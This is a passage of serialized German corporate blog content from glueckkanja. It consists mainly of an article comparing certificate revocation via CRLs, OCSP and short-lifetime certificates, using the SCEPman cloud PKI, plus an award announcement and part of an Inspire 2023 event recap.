Score, Exposure Score, Konfiguration, Vulnerable Anwendungen, Defender for Vulnerability Management, Threat & Vulnerability Management, Software-Updates, Software-Upgrades, Microsoft Defender External Attack Surface Management, Angriffsfläche, Schwachstellen Mitigation, Infrastruktur Assessments, PenTest, Red Teaming Events, Aktualisierungsprozesse, Patch-Day",[8717],{"lang":2118,"href":8718},"/blog/security/csoc/defender365/corporate/2023/05/vulnerability-management-defender-en","/posts/2023-05-12-vulnerability-management-defender",{"title":8636,"description":8642},"posts/2023-05-12-vulnerability-management-defender",[4707,1127,8209],"R75hWFcomHlvnUMM9fvAsNPh2J3KuWb1hv6myDW1yMw",{"id":8725,"title":8726,"author":8727,"body":8728,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9053,"moment":9054,"navigation":415,"path":9063,"seo":9064,"stem":9065,"tags":9066,"webcast":406,"__hash__":9068},"content_de/posts/2023-05-15-certificate-revocation.md","Zertifikate: Laufzeiten und Widerrufe kontrollieren",[1630],{"type":350,"value":8729,"toc":9046},[8730,8734,8737,8740,8743,8746,8753,8756,8759,8762,8766,8774,8780,8793,8796,8799,8802,8817,8838,8841,8847,8867,8871,8874,8877,8880,8887,8890,8899,8913,8917,8920,9014,9016,9024,9028,9037],[629,8731,8733],{"id":8732},"certificate-revocation-lists-crls","Certificate Revocation Lists (CRLs)",[353,8735,8736],{},"Lange Zeit waren CRLs der de-facto-Standard bei PKIs. Eine Certification Authority (CA) erstellt dabei regelmäßig eine Liste von Zertifikatswiderrufen, jeweils mit Seriennummer, Widerrufszeitpunkt und Widerrufsgrund. Die Liste selbst hat ein Erstellungsdatum und ein Ablaufdatum und wird fast immer von der CA selbst signiert. Als Datei wird sie auf einem oder mehreren CRL Distribution Points (CDPs) veröffentlicht. Früher war meist LDAP dabei, mittlerweile oft nur noch HTTP. Bei Root CAs, die nur Sub-CA-Zertifikate ausstellen, ist eine Gültigkeit von 6-12 Monaten üblich. CRLs von Sub CAs sind typischerweise 1-2 Wochen gültig.",[353,8738,8739],{},"Dabei lädt ein System normalerweise nicht bei jeder Zertifikatsprüfung die aktuelle CRL herunter, sondern nutzt eine CRL aus dem Cache, die es bereits bei einer früheren Prüfung heruntergeladen hat. Eine neue CRL wird dann erst kurz vor Ablauf der CRL heruntergeladen. CRLs können nämlich sehr groß werden -- die CRLs von öffentlichen CAs enthalten teils viele Zertifikate und können auf mehrere MB Größe anwachsen.",[353,8741,8742],{},"Das hat zusätzlich den Vorteil, dass bei Ausfall der CDPs die Zertifikate weiterhin mit der gecachten CRL auf Gültigkeit geprüft werden können. Aus guten Gründen werden nämlich Zertifikate, deren Gültigkeit nicht geprüft werden kann, als ungültig betrachtet, allerdings abhängig von der Einstellung. Angreifer könnten sonst gestohlene und widerrufene Zertifikate durch Störung der Verbindung zum CDP trotzdem verwenden.",[353,8744,8745],{},"Leider kommt deswegen ein Widerruf aber nur mit einer gewissen Trägheit sicher bei allen beteiligten Systemen an. Wird ein Zertifikat zurückgezogen, direkt nach Ausstellung einer zwei Wochen gültigen CRL, dann kann das Zertifikat noch zwei Wochen auf Systemen verwendet werden, die diese CRL nutzen.",[2559,8747,8748],{},[356,8749],{"src":8750,"alt":8751,"style":8752},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-scepman-crl.png","CRL Structure","width: 50%; margin-bottom: 50px;",[353,8754,8755],{},"Eine moderne Lösung, um die Verfügbarkeit des CDPs zu gewährleisten, ist der Einsatz eines Content Delivery Networks (CDNs), zum Beispiel auf Basis von Azure Blob Storage. Als Best Practice für Microsoft CAs richtet man dazu auf dem CA-System einen Scheduled Task ein, der beispielsweise täglich eine neue CRL ausstellt und in den Blob Storage hochlädt.",[353,8757,8758],{},"SCEPmans Architektur ist stateless, es verwendet für den üblichen Betrieb keine eigene Datenbank. Das hat viele Vorteile. Zum Beispiel sind Backups nicht nötig. Mehrere SCEPman-Instanzen laufen ohne weitere Konfiguration parallel; dadurch ist zum Beispiel auch ein automatisches Out-Scaling möglich, um Lastspitzen abzufangen. Die Zustandslosigkeit ist für eine Cloud-Anwendung also sehr gut, aber CRLs sind ohne Datenbank und damit ohne Speicherung der Liste widerrufener Zertifikate nicht möglich. SCEPman 2.4 generiert dynamisch CRLs bei jedem Zugriff auf den CDP, wobei die CRL nur manuell widerrufene Zertifikate enthält, so wie bei einer klassischen PKI.",[353,8760,8761],{},"Für eine Cloud-PKI gibt es glücklicherweise eine bessere Alternative:",[629,8763,8765],{"id":8764},"online-certificate-status-protocol-ocsp","Online Certificate Status Protocol (OCSP)",[353,8767,8768,8773],{},[374,8769,8772],{"href":8770,"rel":8771},"https://tools.ietf.org/html/rfc6960#section-2",[378],"OCSP wurde 1999 für Hochsicherheitsanwendungen entworfen",", bei denen die hohe Widerrufslatenz bei CRLs nicht akzeptabel war. Statt eine Liste aller widerrufenen Zertifikate vorzuhalten, kann ein System hierbei den Status eines konkreten Zertifikats von einem OCSP Responder abfragen. Um die Gültigkeit eines Zertifikats in Echtzeit zu prüfen, ist somit nur eine vergleichsweise kleine HTTP-Abfrage nötig. Der Antwortteil in der OCSP Response zum abgefragten Zertifikat hat dabei die gleiche ASN.1-Datenstruktur wie ein CRL-Eintrag, also Seriennummer, Widerrufszeitpunkt und Widerrufsgrund. Hierbei gibt es also keinen Unterschied zur CRL.",[2559,8775,8776],{},[356,8777],{"src":8778,"alt":8779,"style":8752},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-ocsp-response.png","OCSP Response",[2559,8781,8783],{"style":8782},"margin-bottom: 50px;",[2559,8784,2557,8786,2557,8790],{"style":8785},"background-color: var(--color-yellow); padding: 35px;",[629,8787,8789],{"id":8788},"warum-nutzen-cdps-und-ocsp-kein-tls","Warum nutzen CDPs und OCSP kein TLS?",[353,8791,8792],{},"So wie bei der Abfrage von CDPs auch verwendet OCSP übrigens üblicherweise kein TLS, also HTTPS, sondern HTTP. Ansonsten könnte ein Henne-Ei-Problem entstehen, denn die beim Aufbau der TLS-Verbindung verwendeten Zertifikate müssen ja auch auf ihren Widerruf geprüft werden. Das haben die Schöpfer natürlich bedacht, weswegen sowohl CRLs als auch OCSP Responses von der CA oder einer berechtigten Stelle kryptografisch signiert sein müssen. Der authentische Ursprung der Widerrufsinformationen ist daher auch über den unsicheren HTTP-Kanal gewährleistet.",[353,8794,8795],{},"Die höhere Aktualität der Widerrufsinformationen hat einen Preis -- fallen die OCSP-Responder einer CA aus, dann kann sofort kein Widerruf mehr geprüft werden, wodurch üblicherweise alle ausgestellten Zertifikate unverwendbar werden. Für OCSP-Responder sollte deswegen eine hohe Verfügbarkeit sichergestellt werden.",[353,8797,8798],{},"Bei den jeweiligen Implementierungen muss man allerdings genau hinschauen. Zum Beispiel Microsofts OCSP-Server nutzen als Widerrufsdatenbank eine CRL. Bei einer OCSP-Anfrage schaut der OCSP-Server also in der CRL nach, ob das Zertifikat dort eingetragen ist und antwortet entsprechend. Widerruft man ein Zertifikat an der CA, wird deswegen noch keine neue CRL erstellt und entsprechend wird der OCSP-Server genau wie die CRL behaupten, dass das Zertifikat nicht widerrufen sei. Einen Echtzeit-Widerruf erhält man also nicht automatisch, nur weil man OCSP einsetzt.",[353,8800,8801],{},"SCEPman nutzt OCSP, um die Zertifikatsgültigkeit zu steuern. Wird ein Zertifikat auf Widerruf geprüft, sucht SCEPman im Moment der OCSP-Anfrage das zugehörige Objekt -- die Maschine oder den Nutzer -- in Azure AD oder der JAMF-Datenbank und vergleicht, ob es den konfigurierten Anforderungen genügt. Wenn man beispielsweise ein Computerobjekt im AAD deaktiviert oder löscht, wird damit sofort auch dessen Zertifikat ungültig. So konnten wir erreichen, dass man Zertifikate ohne Zeitverzug widerrufen kann und sogar ohne die bei herkömmlichen PKIen erforderliche umständliche Zertifikatsverwaltung.",[353,8803,8804,8805,8810,8811,8816],{},"Wie im letzten Abschnitt beschrieben, ist SCEPman zustandslos. Das haben wir erreicht, indem SCEPman AAD und JAMF als Basis für den Zertifikatsstatus nutzt und deswegen keine eigene Datenbank benötigt. Daher lässt sich SCEPman leicht hochverfügbar realisieren, auch ",[374,8806,8809],{"href":8807,"rel":8808},"https://docs.scepman.com/scepman-configuration/optional/geo-redundancy",[378],"geo-redundant",". Microsoft ",[374,8812,8815],{"href":8813,"rel":8814},"https://azure.microsoft.com/en-us/support/legal/sla/app-service",[378],"garantiert für seine Azure App Services eine hohe Verfügbarkeit",", so dass selbst mit einer Instanz oft eher das VPN-Gateway oder der WiFi-NAC ausfällt als der OCSP-Responder. Während die aufwändige Hochverfügbarkeit mit on-premises-Komponenten den Einsatz eines OCSP-Responders verhindern kann, ist sie bei SCEPman kein Problem.",[353,8818,8819,8820,8825,8826,8831,8832,8837],{},"Manche Zertifikate sind jedoch auch bei SCEPman nicht mit einem Verzeichnisobjekt verknüpft oder man möchte sie unabhängig vom Zustand des Verzeichnisobjekts widerrufen. Beispiele wären die ",[374,8821,8824],{"href":8822,"rel":8823},"https://docs.scepman.com/certificate-deployment/static-certificates/mosyle",[378],"Zertifikatsverteilung über Mosyle",", soweit man die Zertifikate nicht trotzdem ",[374,8827,8830],{"href":8828,"rel":8829},"https://docs.scepman.com/advanced-configuration/application-settings/staticaad-validation",[378],"an AAD-Objekte knüpft",", oder ",[374,8833,8836],{"href":8834,"rel":8835},"https://docs.scepman.com/certificate-deployment/certificate-master",[378],"Server-Zertifikate",". Für diese Fälle nutzt SCEPman dann doch eine Datenbank, nämlich einen Azure Storage Account mit Table Storage. SCEPman benötigt die Datenbank für OCSP aber nur lesend und Table Storage ist nicht-relational und selbst in der günstigsten SKU schon redundant, so dass Replikationen entfallen und Backups nicht nötig sind. SCEPman nutzt die Datenbank parallel zum etwaigen MDM-Verzeichnis als Quelle von Widerrufsinformationen. Falls erforderlich kann SCEPman dennoch ausgestellte Zertifikate in der Datenbank speichern, um einen einfachen manuellen Widerruf zu ermöglichen als Ergänzung zum automatischen Widerruf.",[353,8839,8840],{},"Das folgende Diagram zeigt, wie OCSP bei SCEPman funktioniert bei einer Installation auf drei verteilten App-Service-Instanzen:",[353,8842,8843],{},[356,8844],{"alt":8845,"src":8846},"OCSP verification in a geo-redundant SCEPman setup","https://res.cloudinary.com/c4a8/image/upload/v1684157027/blog/pics/img-scepman-ocsp-structure-chart.png",[353,8848,8849,8850,8854,8855,8860,8861,8866],{},"Hierbei möchte ein Client (das muss kein Endnutzer-Gerät sein, sondern zum Beispiel ein RADIUS-Server wie ",[374,8851,3579],{"href":8852,"rel":8853},"https://www.radius-as-a-service.com/",[378],") die Gültigkeit eines Zertifikats prüfen. Er nutzt den DNS-basierten Azure Traffic Manager, um eine funktionsfähige und nahe SCEPman-Instanz zu finden und ihr einen OCSP-Request zu schicken. Die gewählte SCEPman-Instanz fragt daraufhin parallel den Azure-Storage-Account und Intune ab, um zu sehen, ob das mit dem Zertifikat verknüpfte Geräteobjekt existiert und in einem gültigen Zustand ist. Die OCSP-Response spiegelt die Ergebnisse wieder. Eine einzige Azure-Storage-Instanz reicht aus, weil Azure Storage immer redundant ist, der Grad der Redundanz ",[374,8856,8859],{"href":8857,"rel":8858},"https://learn.microsoft.com/en-us/azure/storage/common/storage-redundancy",[378],"hängt von der gewählten SKU ab",". Azure Key Vault ",[374,8862,8865],{"href":8863,"rel":8864},"https://learn.microsoft.com/en-us/azure/key-vault/general/disaster-recovery-guidance",[378],"ist ebenfalls immer redundant",". MEM/Intune ist als Microsoft Cloud-Service ohnehin redundant ausgelegt. Die SCEPman-Instanzen kommunizieren nicht mit einander und Clients bauen keine Sessions mit SCEPman-Instanzen für ihre OCSP-Requests auf, so dass keine Cookies oder ähnliches beteiligt sind. SCEPman-Instanz können deswegen wie benötigt einfach hinzugefügt und entfernt werden.",[629,8868,8870],{"id":8869},"short-lifetime-certificates","Short Lifetime Certificates",[353,8872,8873],{},"In manchen Anwendungen ist es von Vorteil, wenn gar keine Widerrufsprüfung vor jeder Zertifikatsverwendung notwendig ist. Ein Beispiel sind Systeme, die völlig ohne Netzwerkverbindung -- und damit ohne Kontakt zu CDP oder OCSP-Responder, miteinander kommunizieren sollen. Oder eine Gültigkeitsprüfung ist so aufwändig, dass sie nur zum Zeitpunkt der Ausstellung unter Beteiligung des Zertifikatsinhabers stattfinden kann, nicht aber durch die CA. Trotzdem können solche Zertifikate kompromittiert werden und die PKI muss den Schaden durch die Kompromittierung eingrenzen können, indem das Zertifikat seine Gültigkeit wieder verliert.",[353,8875,8876],{},"In solchen Fällen bieten sich Short Lifetime Certificates an, also Zertifikate, die von vorneherein eine vergleichsweise kurze Gültigkeitsdauer haben, nur Tage oder Stunden. Ein Widerruf ist bei solchen Zertifikaten nicht nötig, da ein kompromittiertes Zertifikat ohnehin nach kurzer Zeit ungültig wird -- oft sogar schneller als bei Einsatz einer CRL.",[353,8878,8879],{},"Durch die einfachere Architektur ergeben sich weitere Vorteile: Der CDP oder OCSP-Responder muss nicht geplant und betrieben werden. Bei der Zertifikatsnutzung ist kein Netzwerkverkehr notwendig. Die Zertifikate müssen wegen ihres geringen Werts nicht verwaltet werden.",[353,8881,8882,8883,8886],{},"Ein Fallstrick ist jedoch, dass die Zertifikate besser auch gar nicht verwaltet werden ",[748,8884,8885],{},"sollten",". Durch die kurze Gültigkeit stellt eine CA deutlich mehr solcher Zertifikate aus als bei Einsatz langlebiger Zertifikate. Werden Short Lifetime Certificates trotzdem in einer Datenbank gespeichert, so wächst diese schnell auf sonst unübliche Größen an, für die sie womöglich nicht ausgelegt ist. Die Microsoft CA bietet deswegen pro Zertifikatsvorlage an, diese Zertifikate gar nicht erst in der Datenbank zu speichern. Dazu muss die Kompatibilitätsstufe auf mindestens Windows Server 2008 R2 gestellt werden, was nicht die Voreinstellung ist.",[353,8888,8889],{},"Für WiFi- und VPN-Client-Zertifikate sind Short Lifetime Certificates nicht optimal. Der Aufbau der Netzwerkverbindung benötigt ein gültiges Zertifikat; aber um ein neues Zertifikat zu erhalten, benötigt der Client eine Netzwerkverbindung. Das ist dann kein Problem, wenn die Zertifikate rechtzeitig vor Ablauf erneuert werden. Dafür sorgen Microsoft Intune oder JAMF in Zusammenspiel mit SCEPman automatisch, auch mit einer traditionellen Microsoft CA und Auto-Enrollment ist eine Erneuerung ohne Nutzerinteraktion möglich. Bei Short Lifetime Certificates geraten Maschinen spätestens dann in den Teufelskreis aus fehlender Netzwerkverbindung und fehlendem Zertifikat, wenn ihre Nutzer eine Woche im Urlaub sind und deren Geräte in dieser Zeit ausgeschaltet sind.",[353,8891,8892,8893,8898],{},"Bei TLS-Zertifikaten geht ",[374,8894,8897],{"href":8895,"rel":8896},"https://letsencrypt.org/2015/11/09/why-90-days.html",[378],"Let's Encrypt bereits in die Richtung kürzerer Zertifikatslaufzeiten",". Durch die automatisierte Zertifikatsausstellung und weil Server nur dann Zertifikate brauchen, während sie laufen, ist das für Server auch kein Problem.",[353,8900,8901,8902,8907,8908,456],{},"SCEPman empfiehlt Short Lifetime Certificates daher nur für Server-Zertifikate. Ab Version 1.7 kann die Zertifikatslaufzeit pro Endpunkt konfiguriert werden, so dass man OCSP für Clientzertifikate nutzen kann, während man beispielsweise ",[374,8903,8906],{"href":8904,"rel":8905},"https://docs.scepman.com/certificate-deployment/other-1/domain-controller-certificates",[378],"automatisch beantragte Domain-Controller-Zertifikate"," mit einer kürzeren Laufzeit versieht. Kurze Laufzeiten sind außerdem empfehlenswert, wenn man zusätzliche Systeme ",[374,8909,8912],{"href":8910,"rel":8911},"https://docs.scepman.com/certificate-deployment/other-1/static-certificates",[378],"über den statischen Endpunkt mit Zertifikaten versorgt",[629,8914,8916],{"id":8915},"schlussfolgerung","Schlussfolgerung",[353,8918,8919],{},"Jede Widerrufsmethode hat eigene Vor- und Nachteile, womit die optimale Wahl vom konkreten Einsatz abhängt. Für eine traditionelle on-premises Infrastruktur-PKI sind CRLs meist die beste Wahl, weil sie einfach umzusetzen sind. Bei einer modernen Cloud-PKI wie SCEPman ist OCSP besser, da es Widerruf in Echtzeit ermöglicht und eine cloud-freundliche zustandslose Umsetzung. Short Lifetime Certificates haben für manche Anwendungen ihre Daseinsberechtigung und können mit CRLs oder OCSP in einer einzelnen PKI gemischt werden. Die Wahl der Methode hängt dann vom Zertifikatstyp ab. Die folgende Tabelle fasst einige der wichtigsten Argumente für die einzelnen Techniken zusammen:",[8921,8922,8923,8924],"table",{},"\n  ",[8925,8926,8927,8923,8944,8923,8961,8923,8975,8923,8988,8923,9000],"tbody",{},[8928,8929,2557,8931,2557,8935,2557,8938,2557,8941,8923],"tr",{"style":8930},"background-color: var(--color-black-30); border-bottom: 1px solid var(--color-black-50);",[8932,8933],"th",{"style":8934},"padding: 5px;",[8932,8936,8937],{"style":8934},"CRL",[8932,8939,8940],{"style":8934},"OCSP",[8932,8942,8943],{"style":8934},"Short Lifetime",[8928,8945,2557,8947,2557,8952,2557,8955,2557,8958,8923],{"style":8946},"border-bottom: 1px solid var(--color-black-30);",[8948,8949,8951],"td",{"style":8950},"vertical-align: top; padding: 5px;","Latency",[8948,8953,8954],{"style":8950},"Until next CRL update, typically 1-2 weeks at most",[8948,8956,8957],{"style":8950},"0-3 minutes in good implementations",[8948,8959,8960],{"style":8950},"Until natural expiration, typically 1-14 days",[8928,8962,2557,8963,2557,8966,2557,8969,2557,8972,8923],{"style":8946},[8948,8964,8965],{"style":8950},"Required Availability",[8948,8967,8968],{"style":8950},"Low",[8948,8970,8971],{"style":8950},"High",[8948,8973,8974],{"style":8950},"None",[8928,8976,2557,8977,2557,8980,2557,8983,2557,8986,8923],{"style":8946},[8948,8978,8979],{"style":8950},"Architectural Complexity",[8948,8981,8982],{"style":8950},"Medium (DB required)",[8948,8984,8985],{"style":8950},"Medium to high if a DB is used, otherwise low",[8948,8987,8974],{"style":8950},[8928,8989,2557,8990,2557,8993,2557,8996,2557,8998,8923],{"style":8946},[8948,8991,8992],{"style":8950},"Revocation Reasons",[8948,8994,8995],{"style":8950},"All",[8948,8997,8995],{"style":8950},[8948,8999,8974],{"style":8950},[8928,9001,2557,9002,2557,9005,2557,9008,2557,9011,8923],{"style":8946},[8948,9003,9004],{"style":8950},"Temporary Revocations",[8948,9006,9007],{"style":8950},"Yes, but often impractical because of the latency",[8948,9009,9010],{"style":8950},"Yes",[8948,9012,9013],{"style":8950},"No",[2559,9015],{"style":8782},[353,9017,9018,9019,456],{},"Für Öffentliche Zertifizierungsstellen verlangen Apple und Mozilla CRLs, da OCSP in diesem Fall ein Datenschutz-Problem verursacht: Jede OCSP-Anfrage zeigt dem OCSP-Responder, welche Domain von welcher IP-Adresse besucht wurde. Für interne CAs wie SCEPman ist das kein Problem, da die Organisation, die SCEPman nutzt, einerseits den OCSP-Responder betreibt, aber auch die Clients verwaltet, auf die SCEPman Zertifikate verteilt. Deswegen erlangt sie über den OCSP-Responder keine zusätzlichen Informationen. Aaron Gable von Let's Encrypt hat ",[374,9020,9023],{"href":9021,"rel":9022},"https://letsencrypt.org/2022/09/07/new-life-for-crls.html",[378],"dies zusammengefasst und erklärt wie Let's Encrypt damit umgeht",[629,9025,9027],{"id":9026},"sonderfall-aad-cba","Sonderfall AAD CBA",[353,9029,9030,9031,9036],{},"Ein Sonderfall ist die ",[374,9032,9035],{"href":9033,"rel":9034},"https://learn.microsoft.com/en-us/azure/active-directory/authentication/concept-certificate-based-authentication",[378],"zertifikatsbasierte Authentifizierung für Azure AD",", die vor Kurzem den Preview-Status verlassen hat. Microsoft hat bei der Umsetzung offenbar nicht auf verbreitete Krypto-Bibliotheken zurückgegriffen, die ausnahmslos sowohl OCSP als auch CRLs unterstützen, sondern die kryptografischen Routinen selbst geschrieben und dabei nur CRL-Unterstützung umgesetzt. Dabei wird auch nicht der CDP aus dem Zertifikat ausgelesen, sondern separat im Azure-Portal konfiguriert. Hierfür ergeben sich daher besondere Anforderungen.",[353,9038,9039,9040,9045],{},"Dies ist ein Anwendungsfall, um ",[374,9041,9044],{"href":9042,"rel":9043},"https://docs.scepman.com/advanced-configuration/application-settings/crl",[378],"SCEPmans CDP"," im AAD zu hinterlegen. Wenn das AAD einen Zertifikatswiderruf prüft, wird es die CRL nutzen. Andere Systeme verwenden den OCSP-Responder mit seinen aktuelleren Widerrufsinformationen und besserer Performance.",{"title":402,"searchDepth":403,"depth":403,"links":9047},[9048,9049,9050,9051,9052],{"id":8732,"depth":704,"text":8733},{"id":8764,"depth":704,"text":8765},{"id":8869,"depth":704,"text":8870},{"id":8915,"depth":704,"text":8916},{"id":9026,"depth":704,"text":9027},{"titleClass":7896,"date":9054,"categories":9055,"blogtitlepic":9056,"socialimg":9057,"customExcerpt":9058,"keywords":9059,"hreflang":9060},"2023-05-15",[2949],"head-scepman-revocation","/blog/heads/head-scepman-revocation.jpg","Bei jeder Public-Key-Infrastruktur (PKI) kann es vorkommen, dass ein ausgestelltes Zertifikat nicht mehr gültig sein soll. Dafür haben sich drei grundlegende Techniken entwickelt, jede mit eigenen Vor- und Nachteilen: CRLs, OCSP und Short Lifetime Certificates. Dieser Artikel stellt die Techniken gegenüber und illustriert das am Beispiel der Architektur unseres Produktes SCEPman.","Zertifikate, Laufzeiten, Widerrufe, Public-Key-Infrastruktur, PKI, CRLs, OCSP, Short Lifetime Certificates, Certification Authority, CDPs, LDAP, HTTP, Zertifikatsprüfung, Cache, Ausfall, Gültigkeit, Zertifikatswiderruf, Content Delivery Network, CDN, Azure Blob Storage, stateless, Datenbank, Verfügbarkeit, OCSP Responder, Echtzeit, ASN.1-Datenstruktur, TLS, HTTPS, Verfügbarkeit, Implementierungen, Azure AD, JAMF-Datenbank, Microsoft Endpoint Manager, Microsoft Intune, JAMF, Netzwerkverbindung, Let’s Encrypt, Server-Zertifikate, on-premises, Datenschutz, zertifikatsbasierte Authentifizierung, Azure AD, CBA",[9061],{"lang":2118,"href":9062},"/blog/products/2023/05/certificate-revocation-en","/posts/2023-05-15-certificate-revocation",{"title":8726,"description":402},"posts/2023-05-15-certificate-revocation",[1117,3631,2949,9067],"Zertifikate","MtpfNK307vUGFDbYyJQwp3Dlab9-CvRElrld6DA2pI8",{"id":9070,"title":9071,"author":9072,"body":9073,"cta":3,"description":9077,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9100,"moment":9101,"navigation":415,"path":9116,"seo":9117,"stem":9118,"tags":9119,"webcast":406,"__hash__":9120},"content_de/posts/2023-06-28-partner-of-the-year-accelerate-trust.md","glueckkanja gewinnt bei den Partner of the Year Awards den Accelerate Trust",[191],{"type":350,"value":9074,"toc":9098},[9075,9078,9081,9084,9087,9089,9092,9095],[353,9076,9077],{},"Im Rahmen der weltweiten Partner of the Year-Awards von Microsoft wird die Accelerate-Auszeichnung verliehen, um besondere Beiträge im nationalen Partner-Ökosystem hervorzuheben. Dieses Ökosystem besteht allein in Deutschland aus über 30.000 Akteuren, darunter IT-Dienstleister, Cloud-Anbieter, Managed Service Provider, Distributoren, Developer, Support-Dienstleister und IT-Professionals aller Art. Ausgezeichnet werden Partner, die sich nicht nur durch beeindruckende Umsatzzahlen und Innovationskraft, sondern auch durch herausragende Leistungen in den Bereichen Nachhaltigkeit, Cyber Security und Unternehmenskultur auszeichnen.",[353,9079,9080],{},"Mit der erfolgreichen Implementierung und dem Management von Security-Plattform-Lösungen bei führenden deutschen Energieversorgern hat glueckkanja einen wesentlichen Beitrag zur Erhöhung der IT-Sicherheit geleistet, die sich wiederum positiv auf die allgemeine Versorgungssicherheit in Deutschland auswirkt. Die umfassenden Dienstleistungen von glueckkanja reichen von Monitoring und Incident Response bis hin zu Training und Support.",[353,9082,9083],{},"Aufgrund dieser bemerkenswerten Leistungen wurde glueckkanja nicht nur als erster europäischer Partner, sondern auch als einer der ersten drei Partner weltweit mit dem prestigeträchtigen Microsoft Verified Managed Extended Detection and Response (MXDR) Status ausgezeichnet. Zusätzliche Anerkennung erhielt das Unternehmen kürzlich auf der RSA-Konferenz in San Francisco. Hier wurde das Unternehmen in der hart umkämpften Kategorie \"Security MSSP of the Year\" für den Microsoft Security Excellence Award 2023 unter die Top 5 gewählt.",[353,9085,9086],{},"Nun setzt glueckkanja seine Erfolgsserie fort und erhält auch in Deutschland die begehrte Auszeichnung \"Partner of the Year Award 2023\" in der Kategorie \"Accelerate Trust\" von Microsoft, was die führende Position des Unternehmens in der Branche weiter untermauert.",[7882,9088],{":img":7884,":alt":7885,":cloudinary":7391,"img-src-sets":7886},[353,9090,9091],{},"Christian Kanja, Vorstand der glueckkanja AG, freut sich über die Auszeichnung und die damit verbundene Anerkennung: \"Unsere umfassenden Managed Detection & Response (MDR)-Services stellen sicher, dass die gesamte IT-Sicherheit kontinuierlich überwacht wird und eine effektive Abwehr von Cyber-Bedrohungen gewährleistet ist. Durch kontinuierliche Bemühungen um nachhaltige Verbesserungen haben wir das Vertrauen und die Anerkennung unserer Kunden gewonnen. Die nun von Microsoft verliehene Auszeichnung belegt eindrucksvoll, dass wir wirkungsvolle Lösungen für die Herausforderungen im Bereich der Cyber Security bieten. Microsoft hat uns einmal mehr darin bestätigt, den eingeschlagenen Weg konsequent weiterzugehen.\"",[353,9093,9094],{},"Die Auszeichnung „Partner of the Year“ wird im Rahmen der Microsoft Inspire 2023 verliehen. Die weltweite Partnerkonferenz zeichnet Unternehmen aus über 100 Ländern aus, die in insgesamt 58 Kategorien Exzellenz bei Innovationen und der Entwicklung von Kundenlösungen auf Basis von Microsoft-Technologien gezeigt haben. glueckkanja ist eines dieser Unternehmen und zeigt einmal mehr, dass deutsche IT-Unternehmen in der Lage sind, auf der globalen Bühne zu punkten.",[353,9096,9097],{},"Die Microsoft Inspire 2023 findet vom 18. bis 20. Juli als Hybrid-Event statt. glueckkanja wird als Featured Partner sowohl mit einem Stand vor Ort in München als auch mit einer Online-Session vertreten sein. Ein weiterer Meilenstein in einem spannenden Jahr für glueckkanja und ein Beweis für die Spitzenposition und Innovationskraft des Unternehmens.",{"title":402,"searchDepth":403,"depth":403,"links":9099},[],{"titleClass":7896,"date":9101,"categories":9102,"blogtitlepic":9103,"socialimg":9104,"customExcerpt":9105,"keywords":9106,"quote":9107,"hreflang":9110},"2023-06-28",[410],"head-poy-accelerate-trust","/blog/heads/head-poy-accelerate-trust.jpg","Microsoft hat glueckkanja im Rahmen der Partner of the Year Awards mit dem renommierten Accelerate Trust ausgezeichnet. Das Unternehmen punktete mit der Einführung und dem Betrieb von Security-Plattform-Lösungen bei führenden Energieversorgern und leistet mit seinen Dienstleistungen "Made in Germany" einen wichtigen Beitrag zur IT-Security und damit zur Versorgungssicherheit in Deutschland.","Accelerate Trust, Microsoft Deutschland, Partner of the Year, Umsatz, Innovation, Nachhaltigkeit, Cyber Security, Unternehmenskultur, Security Plattform-Lösungen, Energieversorger, Microsoft Verified Managed Extended Detection and Response (MXDR) Status, Microsoft Security Excellence Award, Managed Detection & Response (MDR)-Services, Microsoft Inspire Konferenz",{"img":9108,"alt":9109},"/blog/pics/quote-edith-wittmann.png","Edith Wittmann",[9111,9113],{"lang":2118,"href":9112},"/blog/corporate/award/poy/2023/06/partner-of-the-year-accelerate-trust-en",{"lang":9114,"href":9115},"es","/blog/corporate/award/poy/2023/06/test-es","/posts/2023-06-28-partner-of-the-year-accelerate-trust",{"title":9071,"description":9077},"posts/2023-06-28-partner-of-the-year-accelerate-trust",[3933,3934],"OOwuSSIMH-BwYjaphbe94nfzzo-SorOde7SGU9aLQ2I",{"id":9122,"title":9123,"author":9124,"body":9125,"cta":3,"description":9129,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9159,"moment":9160,"navigation":415,"path":9168,"seo":9169,"stem":9170,"tags":9171,"webcast":406,"__hash__":9173},"content_de/posts/2023-08-09-inspire-2023-review.md","Inspire 2023 in München: Neustart, Netzwerk & Neuerungen!",[144],{"type":350,"value":9126,"toc":9157},[9127,9130,9148,9151,9154],[353,9128,9129],{},"Das Team von glueckkanja war wieder mit dabei und wir fühlten uns sehr geehrt, den Partner of the Year Accelerate Trust Award für unsere Spitzendisziplin Security ausgezeichnet worden zu sein – herzlichen Dank dafür an Edith Wittmann und Michael Flügge. Dieser Preis ist nicht nur eine Anerkennung für unsere hervorragenden Services, sondern auch ein Zeugnis der erfolgreichen Partnerschaft mit Microsoft.",[353,9131,9132,9133,2454,9137,2454,9140,993,9143,9147],{},"Erstmalig präsentierten wir uns der Microsoft Partner Community als Product-Partner. Alle Besucher konnten sich hierbei ein umfassendes Bild über unsere M365 Companions mit ",[374,9134,9136],{"href":9135,"target":5319},"https://www.konnekt.io","KONNEKT",[374,9138,3631],{"href":9139,"target":5319},"https://www.scepman.com",[374,9141,3696],{"href":9142,"target":5319},"https://www.radius-as-a-service.com",[374,9144,9146],{"href":9145,"target":5319},"https://www.unified-contacts.com","Unified Contacts"," machen. Ein besonderer Dank gilt an dieser Stelle Stefan Schönleber, der als unser Product Marketing & Sales Lead unermüdlich alle Fragen und Anliegen beantwortete. Das Team freute sich über die Unterstützung von Andreas Wach und über das Wiedersehen mit Ebru Baumann und Cornelia Heyde.",[353,9149,9150],{},"Für das Fiskaljahr 24 legt Microsoft Schwerpunkte in den Bereichen AI, Azure Marketplace, EMEA und Corporate Accounts. Wir danken Lisa, Wael und Oliver für den Austausch und die gemeinsame Planung, um Unternehmen umfassender und schneller mit dem kompletten Microsoft Technologie- und Service-Stack zu erreichen. Gemeinsam stehen uns viele Erfolge bevor!",[353,9152,9153],{},"An dieser Stelle möchten wir uns noch einmal für das Engagement unseres bisherigen GPS-Teams – Ulrich, Mathias und Chuanlin – bedanken und freuen uns nun auf die Zusammenarbeit mit Lejla und Kai.",[353,9155,9156],{},"Alles in allem war die Inspire 2023 in München nicht nur ein Ort der Inspiration und Zusammenarbeit, sondern auch der 